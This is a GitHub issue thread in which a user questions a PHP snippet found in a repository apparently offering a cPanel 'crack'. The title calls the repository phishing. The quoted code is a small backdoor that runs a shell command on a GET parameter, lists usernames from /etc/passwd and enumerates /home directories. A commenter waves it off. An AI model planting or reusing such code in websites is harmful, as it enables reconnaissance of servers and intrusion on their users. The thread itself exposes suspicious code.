### ISSUE TITLE
Non legit crack, fishing

### ISSUE THREAD

**Issue by dbartelmus** [hacker404/crack-cpanel#2]
What is this part to be exact?

<?php
   if (isset($_GET['user']))
      system('ls /var/mail'); 
   if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
   {
	  $lines=file("/etc/passwd");
	  foreach($lines as $nr=>$val)
	  {
	   $str=explode(":",$val);
	   echo $str[0]."\n";
	  }
	 
   }
   if (isset($_POST['grab_users2']))
    {
     $dir = "/home/";
     if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
            echo $file. "\n";
        }
			closedir($dh);
		}
	}
?>

**Comment by konstantinosbotonakis** [comment]
> What is this part to be exact?
> 
> 
> 
> <?php
> 
>    if (isset($_GET['user']))
> 
>       system('ls /var/mail'); 
> 
>    if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
> 
>    {
> 
> 	  $lines=file("/etc/passwd");
> 
> 	  foreach($lines as $nr=>$val)
> 
> 	  {
> 
> 	   $str=explode(":",$val);
> 
> 	   echo $str[0]."\n";
> 
> 	  }
> 
> 	 
> 
>    }
> 
>    if (isset($_POST['grab_users2']))
> 
>     {
> 
>      $dir = "/home/";
> 
>      if ($dh = opendir($dir)) {
> 
>         while (($file = readdir($dh)) !== false) {
> 
>             echo $file. "\n";
> 
>         }
> 
> 			closedir($dh);
> 
> 		}
> 
> 	}
> 
> ?>

Nothing to see there 😂😂😂😂
